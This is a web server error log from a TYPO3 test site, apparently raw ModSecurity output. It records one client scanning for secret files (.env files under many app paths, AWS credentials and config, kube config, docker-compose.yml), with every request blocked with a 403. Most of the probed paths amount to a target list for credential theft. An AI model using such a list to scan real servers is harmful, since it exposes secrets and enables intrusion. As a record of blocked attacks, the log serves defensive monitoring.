[Mon Oct 20 09:38:06.792265 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDwAAAAc"]
[Mon Oct 20 09:38:07.033468 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aPXm3342o4RRfFLcfyiFEQAAAAc"]
[Mon Oct 20 09:38:07.033695 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aPXm3342o4RRfFLcfyiFEQAAAAc"]
[Mon Oct 20 09:38:07.033872 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aPXm3342o4RRfFLcfyiFEQAAAAc"]
[Mon Oct 20 09:38:07.144807 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /library/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aPXm3342o4RRfFLcfyiFEgAAAAc"]
[Mon Oct 20 09:38:07.145091 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aPXm3342o4RRfFLcfyiFEgAAAAc"]
[Mon Oct 20 09:38:07.145297 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aPXm3342o4RRfFLcfyiFEgAAAAc"]
[Mon Oct 20 09:38:07.264769 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nextjs-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aPXm3342o4RRfFLcfyiFEwAAAAc"]
[Mon Oct 20 09:38:07.265002 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aPXm3342o4RRfFLcfyiFEwAAAAc"]
[Mon Oct 20 09:38:07.265188 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aPXm3342o4RRfFLcfyiFEwAAAAc"]
[Mon Oct 20 09:38:07.378952 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aPXm3342o4RRfFLcfyiFFAAAAAc"]
[Mon Oct 20 09:38:07.379169 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aPXm3342o4RRfFLcfyiFFAAAAAc"]
[Mon Oct 20 09:38:07.379382 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aPXm3342o4RRfFLcfyiFFAAAAAc"]
[Mon Oct 20 09:38:07.488206 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aPXm3342o4RRfFLcfyiFFQAAAAc"]
[Mon Oct 20 09:38:07.488420 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aPXm3342o4RRfFLcfyiFFQAAAAc"]
[Mon Oct 20 09:38:07.488617 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aPXm3342o4RRfFLcfyiFFQAAAAc"]
[Mon Oct 20 09:38:07.596709 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aPXm3342o4RRfFLcfyiFFgAAAAc"]
[Mon Oct 20 09:38:07.596935 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aPXm3342o4RRfFLcfyiFFgAAAAc"]
[Mon Oct 20 09:38:07.597161 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aPXm3342o4RRfFLcfyiFFgAAAAc"]
[Mon Oct 20 09:38:07.714911 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /myproject/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aPXm3342o4RRfFLcfyiFFwAAAAc"]
[Mon Oct 20 09:38:07.715147 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aPXm3342o4RRfFLcfyiFFwAAAAc"]
[Mon Oct 20 09:38:07.715328 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aPXm3342o4RRfFLcfyiFFwAAAAc"]
[Mon Oct 20 09:38:07.825496 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs/.production/.django"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aPXm3342o4RRfFLcfyiFGAAAAAc"]
[Mon Oct 20 09:38:07.825708 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aPXm3342o4RRfFLcfyiFGAAAAAc"]
[Mon Oct 20 09:38:07.825931 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aPXm3342o4RRfFLcfyiFGAAAAAc"]
[Mon Oct 20 09:38:07.933888 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aPXm3342o4RRfFLcfyiFGQAAAAc"]
[Mon Oct 20 09:38:07.934101 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aPXm3342o4RRfFLcfyiFGQAAAAc"]
[Mon Oct 20 09:38:07.934278 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aPXm3342o4RRfFLcfyiFGQAAAAc"]
[Mon Oct 20 09:38:08.068710 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aPXm4H42o4RRfFLcfyiFGgAAAAc"]
[Mon Oct 20 09:38:08.068914 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aPXm4H42o4RRfFLcfyiFGgAAAAc"]
[Mon Oct 20 09:38:08.069108 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aPXm4H42o4RRfFLcfyiFGgAAAAc"]
[Mon Oct 20 09:38:08.177414 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aPXm4H42o4RRfFLcfyiFGwAAAAc"]
[Mon Oct 20 09:38:08.177666 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aPXm4H42o4RRfFLcfyiFGwAAAAc"]
[Mon Oct 20 09:38:08.177848 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aPXm4H42o4RRfFLcfyiFGwAAAAc"]
[Mon Oct 20 09:38:08.286907 2025] [authz_core:error] [pid 3623218] [client 3.94.103.221:49695] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Mon Oct 20 09:38:08.538984 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aPXm4H42o4RRfFLcfyiFHgAAAAc"]
[Mon Oct 20 09:38:08.539203 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aPXm4H42o4RRfFLcfyiFHgAAAAc"]
[Mon Oct 20 09:38:08.539405 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aPXm4H42o4RRfFLcfyiFHgAAAAc"]
[Mon Oct 20 09:38:08.913759 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "aPXm4H42o4RRfFLcfyiFIQAAAAc"]
[Mon Oct 20 09:38:08.913975 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "aPXm4H42o4RRfFLcfyiFIQAAAAc"]
[Mon Oct 20 09:38:08.914159 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "aPXm4H42o4RRfFLcfyiFIQAAAAc"]
[Mon Oct 20 09:38:09.025465 2025] [authz_core:error] [pid 3623218] [client 3.94.103.221:49695] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Thu Oct 23 07:26:06.374686 2025] [authz_core:error] [pid 3692589] [client 82.102.18.180:58010] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-includes
